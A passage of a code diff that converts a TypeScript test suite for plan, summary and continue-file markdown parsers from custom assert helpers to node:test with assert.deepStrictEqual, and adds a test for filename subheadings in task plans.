-  assertEq(p.filesLikelyTouched.length, 0, 'empty files likely touched');
-}
+  assert.deepStrictEqual(p.filesLikelyTouched.length, 0, 'empty files likely touched');
+});
 
-console.log('\n=== parsePlan: old-format task entries (no sublines) ===');
-{
+test('parsePlan: old-format task entries (no sublines)', () => {
   const content = `# S09: Old Format
 
 **Goal:** Test old-format compatibility.
@@ -618,16 +595,15 @@ console.log('\n=== parsePlan: old-format task entries (no sublines) ===');
 `;
 
   const p = parsePlan(content);
-  assertEq(p.tasks.length, 1, 'one task parsed');
-  assertEq(p.tasks[0].id, 'T01', 'task id');
-  assertEq(p.tasks[0].title, 'Classic Task', 'task title');
-  assertEq(p.tasks[0].done, false, 'task not done');
-  assertEq(p.tasks[0].files, undefined, 'files is undefined for old-format entry');
-  assertEq(p.tasks[0].verify, undefined, 'verify is undefined for old-format entry');
-}
+  assert.deepStrictEqual(p.tasks.length, 1, 'one task parsed');
+  assert.deepStrictEqual(p.tasks[0].id, 'T01', 'task id');
+  assert.deepStrictEqual(p.tasks[0].title, 'Classic Task', 'task title');
+  assert.deepStrictEqual(p.tasks[0].done, false, 'task not done');
+  assert.deepStrictEqual(p.tasks[0].files, undefined, 'files is undefined for old-format entry');
+  assert.deepStrictEqual(p.tasks[0].verify, undefined, 'verify is undefined for old-format entry');
+});
 
-console.log('\n=== parsePlan: new-format task entries with Files and Verify sublines ===');
-{
+test('parsePlan: new-format task entries with Files and Verify sublines', () => {
   const content = `# S10: New Format
 
 **Goal:** Test new-format subline extraction.
@@ -642,18 +618,17 @@ console.log('\n=== parsePlan: new-format task entries with Files and Verify subl
 `;
 
   const p = parsePlan(content);
-  assertEq(p.tasks.length, 1, 'one task parsed');
-  assertEq(p.tasks[0].id, 'T01', 'task id');
-  assertTrue(Array.isArray(p.tasks[0].files), 'files is an array');
-  assertEq(p.tasks[0].files!.length, 2, 'files array has two entries');
-  assertEq(p.tasks[0].files![0], 'types.ts', 'first file is types.ts');
-  assertEq(p.tasks[0].files![1], 'files.ts', 'second file is files.ts');
-  assertEq(p.tasks[0].verify, 'run the test suite', 'verify string extracted correctly');
-  assertTrue(p.tasks[0].description.includes('Why: because we need typed plan entries'), 'Why line accumulates into description');
-}
+  assert.deepStrictEqual(p.tasks.length, 1, 'one task parsed');
+  assert.deepStrictEqual(p.tasks[0].id, 'T01', 'task id');
+  assert.ok(Array.isArray(p.tasks[0].files), 'files is an array');
+  assert.deepStrictEqual(p.tasks[0].files!.length, 2, 'files array has two entries');
+  assert.deepStrictEqual(p.tasks[0].files![0], 'types.ts', 'first file is types.ts');
+  assert.deepStrictEqual(p.tasks[0].files![1], 'files.ts', 'second file is files.ts');
+  assert.deepStrictEqual(p.tasks[0].verify, 'run the test suite', 'verify string extracted correctly');
+  assert.ok(p.tasks[0].description.includes('Why: because we need typed plan entries'), 'Why line accumulates into description');
+});
 
-console.log('\n=== parsePlan: heading-style task entries (### T01 -- Title) ===');
-{
+test('parsePlan: heading-style task entries (### T01 -- Title)', () => {
   const content = `# S11: Heading Style
 
 **Goal:** Test heading-style task parsing.
@@ -673,20 +648,19 @@ Some description for the second task.
 `;
 
   const p = parsePlan(content);
-  assertEq(p.tasks.length, 2, 'heading-style task count');
-  assertEq(p.tasks[0].id, 'T01', 'heading T01 id');
-  assertEq(p.tasks[0].title, 'Implement feature', 'heading T01 title');
-  assertEq(p.tasks[0].done, false, 'heading T01 not done (headings have no checkbox)');
-  assertEq(p.tasks[0].files![0], 'src/feature.ts', 'heading T01 files extracted');
-  assertEq(p.tasks[0].verify, 'npm test', 'heading T01 verify extracted');
-  assertEq(p.tasks[1].id, 'T02', 'heading T02 id');
-  assertEq(p.tasks[1].title, 'Write tests', 'heading T02 title');
-  assertEq(p.tasks[1].estimate, '1h', 'heading T02 estimate');
-  assertTrue(p.tasks[1].description.includes('Some description'), 'heading T02 description');
-}
+  assert.deepStrictEqual(p.tasks.length, 2, 'heading-style task count');
+  assert.deepStrictEqual(p.tasks[0].id, 'T01', 'heading T01 id');
+  assert.deepStrictEqual(p.tasks[0].title, 'Implement feature', 'heading T01 title');
+  assert.deepStrictEqual(p.tasks[0].done, false, 'heading T01 not done (headings have no checkbox)');
+  assert.deepStrictEqual(p.tasks[0].files![0], 'src/feature.ts', 'heading T01 files extracted');
+  assert.deepStrictEqual(p.tasks[0].verify, 'npm test', 'heading T01 verify extracted');
+  assert.deepStrictEqual(p.tasks[1].id, 'T02', 'heading T02 id');
+  assert.deepStrictEqual(p.tasks[1].title, 'Write tests', 'heading T02 title');
+  assert.deepStrictEqual(p.tasks[1].estimate, '1h', 'heading T02 estimate');
+  assert.ok(p.tasks[1].description.includes('Some description'), 'heading T02 description');
+});
 
-console.log('\n=== parsePlan: heading-style with colon separator (### T01: Title) ===');
-{
+test('parsePlan: heading-style with colon separator (### T01: Title)', () => {
   const content = `# S12: Heading Colon Style
 
 **Goal:** Test colon-separated heading tasks.
@@ -702,16 +676,15 @@ console.log('\n=== parsePlan: heading-style with colon separator (### T01: Title
 `;
 
   const p = parsePlan(content);
-  assertEq(p.tasks.length, 2, 'colon heading task count');
-  assertEq(p.tasks[0].id, 'T01', 'colon heading T01 id');
-  assertEq(p.tasks[0].title, 'Setup project', 'colon heading T01 title');
-  assertEq(p.tasks[1].id, 'T02', 'colon heading T02 id');
-  assertEq(p.tasks[1].title, 'Add CI pipeline', 'colon heading T02 title');
-  assertEq(p.tasks[1].estimate, '30m', 'colon heading T02 estimate');
-}
+  assert.deepStrictEqual(p.tasks.length, 2, 'colon heading task count');
+  assert.deepStrictEqual(p.tasks[0].id, 'T01', 'colon heading T01 id');
+  assert.deepStrictEqual(p.tasks[0].title, 'Setup project', 'colon heading T01 title');
+  assert.deepStrictEqual(p.tasks[1].id, 'T02', 'colon heading T02 id');
+  assert.deepStrictEqual(p.tasks[1].title, 'Add CI pipeline', 'colon heading T02 title');
+  assert.deepStrictEqual(p.tasks[1].estimate, '30m', 'colon heading T02 estimate');
+});
 
-console.log('\n=== parsePlan: heading-style with em-dash separator (### T01 — Title) ===');
-{
+test('parsePlan: heading-style with em-dash separator (### T01 — Title)', () => {
   const content = `# S13: Em-Dash Style
 
 **Goal:** Test em-dash separated heading tasks.
@@ -725,13 +698,37 @@ Widget description.
 `;
 
   const p = parsePlan(content);
-  assertEq(p.tasks.length, 1, 'em-dash heading task count');
-  assertEq(p.tasks[0].id, 'T01', 'em-dash heading T01 id');
-  assertEq(p.tasks[0].title, 'Build the widget', 'em-dash heading T01 title');
-}
+  assert.deepStrictEqual(p.tasks.length, 1, 'em-dash heading task count');
+  assert.deepStrictEqual(p.tasks[0].id, 'T01', 'em-dash heading T01 id');
+  assert.deepStrictEqual(p.tasks[0].title, 'Build the widget', 'em-dash heading T01 title');
+});
 
-console.log('\n=== parsePlan: mixed checkbox and heading-style tasks ===');
-{
+test('parsePlan: filename subheadings do not become task ids', () => {
+  const content = `# S15: Filename Headings
+
+**Goal:** Ignore file-reference subheadings inside task descriptions.
+**Demo:** Only real task ids are parsed.
+
+## Tasks
+
+- [ ] **T01: First task** \`est:10m\`
+  Implement the feature.
+
+### constraints.py — \`add_off_request_tiered()\`
+- preserve behavior
+
+### annotations.py — \`annotate()\`
+- keep metadata
+`;
+
+  const p = parsePlan(content);
+  assert.deepStrictEqual(p.tasks.map((task) => task.id), ['T01'], 'filename subheadings should not create extra tasks');
+  assert.deepStrictEqual(p.tasks[0].title, 'First task', 'real task should still parse normally');
+  assert.ok(p.tasks[0].description.includes('preserve behavior'), 'detail lines under filename subheadings should remain attached to the task');
+  assert.ok(p.tasks[0].description.includes('keep metadata'), 'later detail lines should also remain attached to the task');
+});
+
+test('parsePlan: mixed checkbox and heading-style tasks', () => {
   const content = `# S14: Mixed Format
 
 **Goal:** Test mixed formats.
@@ -751,23 +748,21 @@ A heading-style task.
 `;
 
   const p = parsePlan(content);
-  assertEq(p.tasks.length, 3, 'mixed format task count');
-  assertEq(p.tasks[0].id, 'T01', 'mixed T01 id');
-  assertEq(p.tasks[0].done, false, 'mixed T01 not done');
-  assertEq(p.tasks[1].id, 'T02', 'mixed T02 id');
-  assertEq(p.tasks[1].title, 'Heading task', 'mixed T02 title');
-  assertEq(p.tasks[1].estimate, '15m', 'mixed T02 estimate');
-  assertEq(p.tasks[1].done, false, 'mixed T02 not done (heading style)');
-  assertEq(p.tasks[2].id, 'T03', 'mixed T03 id');
-  assertEq(p.tasks[2].done, true, 'mixed T03 done');
-}
+  assert.deepStrictEqual(p.tasks.length, 3, 'mixed format task count');
+  assert.deepStrictEqual(p.tasks[0].id, 'T01', 'mixed T01 id');
+  assert.deepStrictEqual(p.tasks[0].done, false, 'mixed T01 not done');
+  assert.deepStrictEqual(p.tasks[1].id, 'T02', 'mixed T02 id');
+  assert.deepStrictEqual(p.tasks[1].title, 'Heading task', 'mixed T02 title');
+  assert.deepStrictEqual(p.tasks[1].estimate, '15m', 'mixed T02 estimate');
+  assert.deepStrictEqual(p.tasks[1].done, false, 'mixed T02 not done (heading style)');
+  assert.deepStrictEqual(p.tasks[2].id, 'T03', 'mixed T03 id');
+  assert.deepStrictEqual(p.tasks[2].done, true, 'mixed T03 done');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // parseSummary tests
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== parseSummary: full summary with all frontmatter fields ===');
-{
+test('parseSummary: full summary with all frontmatter fields', () => {
   const content = `---
 id: T01
 parent: S01
@@ -822,52 +817,51 @@ None.
   const s = parseSummary(content);
 
   // Frontmatter fields
-  assertEq(s.frontmatter.id, 'T01', 'summary id');
-  assertEq(s.frontmatter.parent, 'S01', 'summary parent');
-  assertEq(s.frontmatter.milestone, 'M001', 'summary milestone');
-  assertEq(s.frontmatter.provides.length, 2, 'provides count');
-  assertEq(s.frontmatter.provides[0], 'parseRoadmap test coverage', 'first provides');
-  assertEq(s.frontmatter.provides[1], 'parsePlan test coverage', 'second provides');
+  assert.deepStrictEqual(s.frontmatter.id, 'T01', 'summary id');
+  assert.deepStrictEqual(s.frontmatter.parent, 'S01', 'summary parent');
+  assert.deepStrictEqual(s.frontmatter.milestone, 'M001', 'summary milestone');
+  assert.deepStrictEqual(s.frontmatter.provides.length, 2, 'provides count');
+  assert.deepStrictEqual(s.frontmatter.provides[0], 'parseRoadmap test coverage', 'first provides');
+  assert.deepStrictEqual(s.frontmatter.provides[1], 'parsePlan test coverage', 'second provides');
 
   // requires (nested objects)
-  assertEq(s.frontmatter.requires.length, 2, 'requires count');
-  assertEq(s.frontmatter.requires[0].slice, 'S00', 'first requires slice');
-  assertEq(s.frontmatter.requires[0].provides, 'type definitions', 'first requires provides');
-  assertEq(s.frontmatter.requires[1].slice, 'S02', 'second requires slice');
-  assertEq(s.frontmatter.requires[1].provides, 'state derivation', 'second requires provides');
+  assert.deepStrictEqual(s.frontmatter.requires.length, 2, 'requires count');
+  assert.deepStrictEqual(s.frontmatter.requires[0].slice, 'S00', 'first requires slice');
+  assert.deepStrictEqual(s.frontmatter.requires[0].provides, 'type definitions', 'first requires provides');
+  assert.deepStrictEqual(s.frontmatter.requires[1].slice, 'S02', 'second requires slice');
+  assert.deepStrictEqual(s.frontmatter.requires[1].provides, 'state derivation', 'second requires provides');
 
-  assertEq(s.frontmatter.affects.length, 1, 'affects count');
-  assertEq(s.frontmatter.affects[0], 'auto-mode dispatch', 'affects value');
-  assertEq(s.frontmatter.key_files.length, 2, 'key_files count');
-  assertEq(s.frontmatter.key_decisions.length, 1, 'key_decisions count');
-  assertEq(s.frontmatter.patterns_established.length, 1, 'patterns_established count');
-  assertEq(s.frontmatter.drill_down_paths.length, 1, 'drill_down_paths count');
+  assert.deepStrictEqual(s.frontmatter.affects.length, 1, 'affects count');
+  assert.deepStrictEqual(s.frontmatter.affects[0], 'auto-mode dispatch', 'affects value');
+  assert.deepStrictEqual(s.frontmatter.key_files.length, 2, 'key_files count');
+  assert.deepStrictEqual(s.frontmatter.key_decisions.length, 1, 'key_decisions count');
+  assert.deepStrictEqual(s.frontmatter.patterns_established.length, 1, 'patterns_established count');
+  assert.deepStrictEqual(s.frontmatter.drill_down_paths.length, 1, 'drill_down_paths count');
 
   // observability_surfaces extraction
-  assertEq(s.frontmatter.observability_surfaces.length, 2, 'observability_surfaces count');
-  assertEq(s.frontmatter.observability_surfaces[0], 'test pass/fail output from node --test', 'first observability surface');
-  assertEq(s.frontmatter.observability_surfaces[1], 'exit code 1 on failure', 'second observability surface');
+  assert.deepStrictEqual(s.frontmatter.observability_surfaces.length, 2, 'observability_surfaces count');
+  assert.deepStrictEqual(s.frontmatter.observability_surfaces[0], 'test pass/fail output from node --test', 'first observability surface');
+  assert.deepStrictEqual(s.frontmatter.observability_surfaces[1], 'exit code 1 on failure', 'second observability surface');
 
-  assertEq(s.frontmatter.duration, '23min', 'duration');
-  assertEq(s.frontmatter.verification_result, 'pass', 'verification_result');
-  assertEq(s.frontmatter.completed_at, '2025-03-10T08:00:00Z', 'completed_at');
+  assert.deepStrictEqual(s.frontmatter.duration, '23min', 'duration');
+  assert.deepStrictEqual(s.frontmatter.verification_result, 'pass', 'verification_result');
+  assert.deepStrictEqual(s.frontmatter.completed_at, '2025-03-10T08:00:00Z', 'completed_at');
 
   // Body fields
-  assertEq(s.title, 'T01: Test parseRoadmap and parsePlan', 'summary title');
-  assertEq(s.oneLiner, 'Created parsers.test.ts with 98 assertions across 16 test groups.', 'one-liner');
-  assertTrue(s.whatHappened.includes('comprehensive tests'), 'whatHappened content');
-  assertEq(s.deviations, 'None.', 'deviations');
+  assert.deepStrictEqual(s.title, 'T01: Test parseRoadmap and parsePlan', 'summary title');
+  assert.deepStrictEqual(s.oneLiner, 'Created parsers.test.ts with 98 assertions across 16 test groups.', 'one-liner');
+  assert.ok(s.whatHappened.includes('comprehensive tests'), 'whatHappened content');
+  assert.deepStrictEqual(s.deviations, 'None.', 'deviations');
 
   // Files modified
-  assertEq(s.filesModified.length, 3, 'filesModified count');
-  assertEq(s.filesModified[0].path, 'tests/parsers.test.ts', 'first file path');
-  assertTrue(s.filesModified[0].description.includes('98 assertions'), 'first file description');
-  assertEq(s.filesModified[1].path, 'types.ts', 'second file path');
-  assertEq(s.filesModified[2].path, 'files.ts', 'third file path');
-}
+  assert.deepStrictEqual(s.filesModified.length, 3, 'filesModified count');
+  assert.deepStrictEqual(s.filesModified[0].path, 'tests/parsers.test.ts', 'first file path');
+  assert.ok(s.filesModified[0].description.includes('98 assertions'), 'first file description');
+  assert.deepStrictEqual(s.filesModified[1].path, 'types.ts', 'second file path');
+  assert.deepStrictEqual(s.filesModified[2].path, 'files.ts', 'third file path');
+});
 
-console.log('\n=== parseSummary: one-liner extraction (bold-wrapped line after H1) ===');
-{
+test('parseSummary: one-liner extraction (bold-wrapped line after H1)', () => {
   const content = `# S01: Parser Test Suite
 
 **All 5 parsers have test coverage with edge cases.**
@@ -878,12 +872,11 @@ Things happened.
 `;
 
   const s = parseSummary(content);
-  assertEq(s.title, 'S01: Parser Test Suite', 'title');
-  assertEq(s.oneLiner, 'All 5 parsers have test coverage with edge cases.', 'bold one-liner');
-}
+  assert.deepStrictEqual(s.title, 'S01: Parser Test Suite', 'title');
+  assert.deepStrictEqual(s.oneLiner, 'All 5 parsers have test coverage with edge cases.', 'bold one-liner');
+});
 
-console.log('\n=== parseSummary: non-bold paragraph after H1 (empty one-liner) ===');
-{
+test('parseSummary: non-bold paragraph after H1 (empty one-liner)', () => {
   const content = `# T02: Some Task
 
 This is just a regular paragraph, not bold.
@@ -894,12 +887,11 @@ Did stuff.
 `;
 
   const s = parseSummary(content);
-  assertEq(s.title, 'T02: Some Task', 'title');
-  assertEq(s.oneLiner, '', 'non-bold line results in empty one-liner');
-}
+  assert.deepStrictEqual(s.title, 'T02: Some Task', 'title');
+  assert.deepStrictEqual(s.oneLiner, '', 'non-bold line results in empty one-liner');
+});
 
-console.log('\n=== parseSummary: files-modified parsing (backtick path — description format) ===');
-{
+test('parseSummary: files-modified parsing (backtick path — description format)', () => {
   const content = `# T03: File Changes
 
 **One-liner.**
@@ -912,15 +904,14 @@ console.log('\n=== parseSummary: files-modified parsing (backtick path — descr
 `;
 
   const s = parseSummary(content);
-  assertEq(s.filesModified.length, 3, 'three files');
-  assertEq(s.filesModified[0].path, 'src/index.ts', 'first path');
-  assertEq(s.filesModified[0].description, 'main entry point', 'first description');
-  assertEq(s.filesModified[1].path, 'src/utils.ts', 'second path');
-  assertEq(s.filesModified[2].path, 'README.md', 'third path');
-}
+  assert.deepStrictEqual(s.filesModified.length, 3, 'three files');
+  assert.deepStrictEqual(s.filesModified[0].path, 'src/index.ts', 'first path');
+  assert.deepStrictEqual(s.filesModified[0].description, 'main entry point', 'first description');
+  assert.deepStrictEqual(s.filesModified[1].path, 'src/utils.ts', 'second path');
+  assert.deepStrictEqual(s.filesModified[2].path, 'README.md', 'third path');
+});
 
-console.log('\n=== parseSummary: missing frontmatter (safe defaults) ===');
-{
+test('parseSummary: missing frontmatter (safe defaults)', () => {
   const content = `# T04: No Frontmatter
 
 **Did something.**
@@ -931,26 +922,25 @@ No frontmatter at all.
 `;
 
   const s = parseSummary(content);
-  assertEq(s.frontmatter.id, '', 'default id empty');
-  assertEq(s.frontmatter.parent, '', 'default parent empty');
-  assertEq(s.frontmatter.milestone, '', 'default milestone empty');
-  assertEq(s.frontmatter.provides.length, 0, 'default provides empty');
-  assertEq(s.frontmatter.requires.length, 0, 'default requires empty');
-  assertEq(s.frontmatter.affects.length, 0, 'default affects empty');
-  assertEq(s.frontmatter.key_files.length, 0, 'default key_files empty');
-  assertEq(s.frontmatter.key_decisions.length, 0, 'default key_decisions empty');
-  assertEq(s.frontmatter.patterns_established.length, 0, 'default patterns_established empty');
-  assertEq(s.frontmatter.drill_down_paths.length, 0, 'default drill_down_paths empty');
-  assertEq(s.frontmatter.observability_surfaces.length, 0, 'default observability_surfaces empty');
-  assertEq(s.frontmatter.duration, '', 'default duration empty');
-  assertEq(s.frontmatter.verification_result, 'untested', 'default verification_result');
-  assertEq(s.frontmatter.completed_at, '', 'default completed_at empty');
-  assertEq(s.title, 'T04: No Frontmatter', 'title still parsed');
-  assertEq(s.oneLiner, 'Did something.', 'one-liner still parsed');
-}
+  assert.deepStrictEqual(s.frontmatter.id, '', 'default id empty');
+  assert.deepStrictEqual(s.frontmatter.parent, '', 'default parent empty');
+  assert.deepStrictEqual(s.frontmatter.milestone, '', 'default milestone empty');
+  assert.deepStrictEqual(s.frontmatter.provides.length, 0, 'default provides empty');
+  assert.deepStrictEqual(s.frontmatter.requires.length, 0, 'default requires empty');
+  assert.deepStrictEqual(s.frontmatter.affects.length, 0, 'default affects empty');
+  assert.deepStrictEqual(s.frontmatter.key_files.length, 0, 'default key_files empty');
+  assert.deepStrictEqual(s.frontmatter.key_decisions.length, 0, 'default key_decisions empty');
+  assert.deepStrictEqual(s.frontmatter.patterns_established.length, 0, 'default patterns_established empty');
+  assert.deepStrictEqual(s.frontmatter.drill_down_paths.length, 0, 'default drill_down_paths empty');
+  assert.deepStrictEqual(s.frontmatter.observability_surfaces.length, 0, 'default observability_surfaces empty');
+  assert.deepStrictEqual(s.frontmatter.duration, '', 'default duration empty');
+  assert.deepStrictEqual(s.frontmatter.verification_result, 'untested', 'default verification_result');
+  assert.deepStrictEqual(s.frontmatter.completed_at, '', 'default completed_at empty');
+  assert.deepStrictEqual(s.title, 'T04: No Frontmatter', 'title still parsed');
+  assert.deepStrictEqual(s.oneLiner, 'Did something.', 'one-liner still parsed');
+});
 
-console.log('\n=== parseSummary: empty body ===');
-{
+test('parseSummary: empty body', () => {
   const content = `---
 id: T05
 parent: S01
@@ -959,16 +949,15 @@ milestone: M001
 `;
 
   const s = parseSummary(content);
-  assertEq(s.frontmatter.id, 'T05', 'id from frontmatter');
-  assertEq(s.title, '', 'empty title');
-  assertEq(s.oneLiner, '', 'empty one-liner');
-  assertEq(s.whatHappened, '', 'empty whatHappened');
-  assertEq(s.deviations, '', 'empty deviations');
-  assertEq(s.filesModified.length, 0, 'no files modified');
-}
+  assert.deepStrictEqual(s.frontmatter.id, 'T05', 'id from frontmatter');
+  assert.deepStrictEqual(s.title, '', 'empty title');
+  assert.deepStrictEqual(s.oneLiner, '', 'empty one-liner');
+  assert.deepStrictEqual(s.whatHappened, '', 'empty whatHappened');
+  assert.deepStrictEqual(s.deviations, '', 'empty deviations');
+  assert.deepStrictEqual(s.filesModified.length, 0, 'no files modified');
+});
 
-console.log('\n=== parseSummary: summary with requires array (nested objects) ===');
-{
+test('parseSummary: summary with requires array (nested objects)', () => {
   const content = `---
 id: T06
 parent: S02
@@ -1003,20 +992,18 @@ Tested.
 `;
 
   const s = parseSummary(content);
-  assertEq(s.frontmatter.requires.length, 3, 'three requires entries');
-  assertEq(s.frontmatter.requires[0].slice, 'S01', 'first requires slice');
-  assertEq(s.frontmatter.requires[0].provides, 'parser functions', 'first requires provides');
-  assertEq(s.frontmatter.requires[1].slice, 'S00', 'second requires slice');
-  assertEq(s.frontmatter.requires[2].slice, 'S03', 'third requires slice');
-  assertEq(s.frontmatter.requires[2].provides, 'state engine', 'third requires provides');
-}
+  assert.deepStrictEqual(s.frontmatter.requires.length, 3, 'three requires entries');
+  assert.deepStrictEqual(s.frontmatter.requires[0].slice, 'S01', 'first requires slice');
+  assert.deepStrictEqual(s.frontmatter.requires[0].provides, 'parser functions', 'first requires provides');
+  assert.deepStrictEqual(s.frontmatter.requires[1].slice, 'S00', 'second requires slice');
+  assert.deepStrictEqual(s.frontmatter.requires[2].slice, 'S03', 'third requires slice');
+  assert.deepStrictEqual(s.frontmatter.requires[2].provides, 'state engine', 'third requires provides');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // parseContinue tests
 // ═══════════════════════════════════════════════════════════════════════════
-
-console.log('\n=== parseContinue: full continue file with all frontmatter fields ===');
-{
+test('parseContinue: full continue file with all frontmatter fields', () => {
   const content = `---
 milestone: M001
 slice: S01
@@ -1051,24 +1038,23 @@ Run the full test suite with node --test.
   const c = parseContinue(content);
 
   // Frontmatter
-  assertEq(c.frontmatter.milestone, 'M001', 'continue milestone');
-  assertEq(c.frontmatter.slice, 'S01', 'continue slice');
-  assertEq(c.frontmatter.task, 'T02', 'continue task');
-  assertEq(c.frontmatter.step, 3, 'continue step');
-  assertEq(c.frontmatter.totalSteps, 5, 'continue totalSteps');
-  assertEq(c.frontmatter.status, 'in_progress', 'continue status');
-  assertEq(c.frontmatter.savedAt, '2025-03-10T08:30:00Z', 'continue savedAt');
+  assert.deepStrictEqual(c.frontmatter.milestone, 'M001', 'continue milestone');
+  assert.deepStrictEqual(c.frontmatter.slice, 'S01', 'continue slice');
+  assert.deepStrictEqual(c.frontmatter.task, 'T02', 'continue task');
+  assert.deepStrictEqual(c.frontmatter.step, 3, 'continue step');
+  assert.deepStrictEqual(c.frontmatter.totalSteps, 5, 'continue totalSteps');
+  assert.deepStrictEqual(c.frontmatter.status, 'in_progress', 'continue status');
+  assert.deepStrictEqual(c.frontmatter.savedAt, '2025-03-10T08:30:00Z', 'continue savedAt');
 
   // Body sections
-  assertTrue(c.completedWork.includes('Steps 1-3 are done'), 'completedWork content');
-  assertTrue(c.remainingWork.includes('Steps 4-5'), 'remainingWork content');
-  assertTrue(c.decisions.includes('manual assert pattern'), 'decisions content');
-  assertTrue(c.context.includes('gsd-s01 worktree'), 'context content');
-  assertTrue(c.nextAction.includes('node --test'), 'nextAction content');
-}
+  assert.ok(c.completedWork.includes('Steps 1-3 are done'), 'completedWork content');
+  assert.ok(c.remainingWork.includes('Steps 4-5'), 'remainingWork content');
+  assert.ok(c.decisions.includes('manual assert pattern'), 'decisions content');
+  assert.ok(c.context.includes('gsd-s01 worktree'), 'context content');
+  assert.ok(c.nextAction.includes('node --test'), 'nextAction content');
+});
 
-console.log('\n=== parseContinue: string step/totalSteps parsed as integers ===');
-{
+test('parseContinue: string step/totalSteps parsed as integers', () => {
   const content = `---
 milestone: M002
 slice: S03
@@ -1101,14 +1087,13 @@ Continue.
 `;
 
   const c = parseContinue(content);
-  assertEq(c.frontmatter.step, 7, 'step parsed as integer 7');
-  assertEq(c.frontmatter.totalSteps, 12, 'totalSteps parsed as integer 12');
-  assertEq(typeof c.frontmatter.step, 'number', 'step is number type');
-  assertEq(typeof c.frontmatter.totalSteps, 'number', 'totalSteps is number type');
-}
+  assert.deepStrictEqual(c.frontmatter.step, 7, 'step parsed as integer 7');
+  assert.deepStrictEqual(c.frontmatter.totalSteps, 12, 'totalSteps parsed as integer 12');
+  assert.deepStrictEqual(typeof c.frontmatter.step, 'number', 'step is number type');
+  assert.deepStrictEqual(typeof c.frontmatter.totalSteps, 'number', 'totalSteps is number type');
+});
 
-console.log('\n=== parseContinue: NaN step values (non-numeric strings) ===');
-{
+test('parseContinue: NaN step values (non-numeric strings)', () => {
   const content = `---
 milestone: M001
 slice: S01
@@ -1150,12 +1135,11 @@ Do things.
   const totalIsNaN = Number.isNaN(c.frontmatter.totalSteps);
   // The parser does parseInt which returns NaN for non-numeric strings
   // There's no || 0 fallback on the parseInt path, so NaN is expected
-  assertTrue(stepIsNaN, 'NaN step when non-numeric string');
-  assertTrue(totalIsNaN, 'NaN totalSteps when non-numeric string');
-}
+  assert.ok(stepIsNaN, 'NaN step when non-numeric string');
+  assert.ok(totalIsNaN, 'NaN totalSteps when non-numeric string');
+});
 
-console.log('\n=== parseContinue: all three status variants ===');
-{
+test('parseContinue: all three status variants', () => {
   for (const status of ['in_progress', 'interrupted', 'compacted'] as const) {
     const content = `---
 milestone: M001
@@ -1173,12 +1157,11 @@ Work.
 `;
 
     const c = parseContinue(content);
-    assertEq(c.frontmatter.status, status, `status variant: ${status}`);
+    assert.deepStrictEqual(c.frontmatter.status, status, `status variant: ${status}`);
   }
-}
+});
 
-console.log('\n=== parseContinue: missing frontmatter ===');
-{
+test('parseContinue: missing frontmatter', () => {
   const content = `## Completed Work
 
 Some work done.
@@ -1201,24 +1184,23 @@ Next thing.
 `;
 
   const c = parseContinue(content);
-  assertEq(c.frontmatter.milestone, '', 'default milestone empty');
-  assertEq(c.frontmatter.slice, '', 'default slice empty');
-  assertEq(c.frontmatter.task, '', 'default task empty');
-  assertEq(c.frontmatter.step, 0, 'default step 0');
-  assertEq(c.frontmatter.totalSteps, 0, 'default totalSteps 0');
-  assertEq(c.frontmatter.status, 'in_progress', 'default status in_progress');
-  assertEq(c.frontmatter.savedAt, '', 'default savedAt empty');
+  assert.deepStrictEqual(c.frontmatter.milestone, '', 'default milestone empty');
+  assert.deepStrictEqual(c.frontmatter.slice, '', 'default slice empty');
+  assert.deepStrictEqual(c.frontmatter.task, '', 'default task empty');
+  assert.deepStrictEqual(c.frontmatter.step, 0, 'default step 0');
+  assert.deepStrictEqual(c.frontmatter.totalSteps, 0, 'default totalSteps 0');
+  assert.deepStrictEqual(c.frontmatter.status, 'in_progress', 'default status in_progress');
+  assert.deepStrictEqual(c.frontmatter.savedAt, '', 'default savedAt empty');
 
   // Body sections still parse
-  assertTrue(c.completedWork.includes('Some work done'), 'completedWork without frontmatter');
-  assertTrue(c.remainingWork.includes('More to do'), 'remainingWork without frontmatter');
-  assertTrue(c.decisions.includes('A decision'), 'decisions without frontmatter');
-  assertTrue(c.context.includes('Some context'), 'context without frontmatter');
-  assertTrue(c.nextAction.includes('Next thing'), 'nextAction without frontmatter');
-}
+  assert.ok(c.completedWork.includes('Some work done'), 'completedWork without frontmatter');
+  assert.ok(c.remainingWork.includes('More to do'), 'remainingWork without frontmatter');
+  assert.ok(c.decisions.includes('A decision'), 'decisions without frontmatter');
+  assert.ok(c.context.includes('Some context'), 'context without frontmatter');
+  assert.ok(c.nextAction.includes('Next thing'), 'nextAction without frontmatter');
+});
 
-console.log('\n=== parseContinue: body section extraction ===');
-{
+test('parseContinue: body section extraction', () => {
   const content = `---
 milestone: M001
 slice: S01
@@ -1252,16 +1234,15 @@ Pick up at step 3: run the integration tests.
 `;
 
   const c = parseContinue(content);
-  assertTrue(c.completedWork.includes('First paragraph'), 'completedWork first paragraph');
-  assertTrue(c.completedWork.includes('Second paragraph'), 'completedWork second paragraph');
-  assertTrue(c.remainingWork.includes('step 3 and step 4'), 'remainingWork detail');
-  assertTrue(c.decisions.includes('approach A over approach B'), 'decisions detail');
-  assertTrue(c.context.includes('Node 22 required'), 'context detail');
-  assertTrue(c.nextAction.includes('step 3: run the integration tests'), 'nextAction detail');
-}
+  assert.ok(c.completedWork.includes('First paragraph'), 'completedWork first paragraph');
+  assert.ok(c.completedWork.includes('Second paragraph'), 'completedWork second paragraph');
+  assert.ok(c.remainingWork.includes('step 3 and step 4'), 'remainingWork detail');
+  assert.ok(c.decisions.includes('approach A over approach B'), 'decisions detail');
+  assert.ok(c.context.includes('Node 22 required'), 'context detail');
+  assert.ok(c.nextAction.includes('step 3: run the integration tests'), 'nextAction detail');
+});
 
-console.log('\n=== parseContinue: total_steps vs totalSteps key support ===');
-{
+test('parseContinue: total_steps vs totalSteps key support', () => {
   // Test total_steps (snake_case) — the primary format
   const content1 = `---
 milestone: M001
@@ -1279,7 +1260,7 @@ Work.
 `;
 
   const c1 = parseContinue(content1);
-  assertEq(c1.frontmatter.totalSteps, 8, 'total_steps snake_case works');
+  assert.deepStrictEqual(c1.frontmatter.totalSteps, 8, 'total_steps snake_case works');
 
   // Test totalSteps (camelCase) — the fallback
   const content2 = `---
@@ -1298,15 +1279,13 @@ Work.
 `;
 
   const c2 = parseContinue(content2);
-  assertEq(c2.frontmatter.totalSteps, 6, 'totalSteps camelCase works');
-}
+  assert.deepStrictEqual(c2.frontmatter.totalSteps, 6, 'totalSteps camelCase works');
+});
 
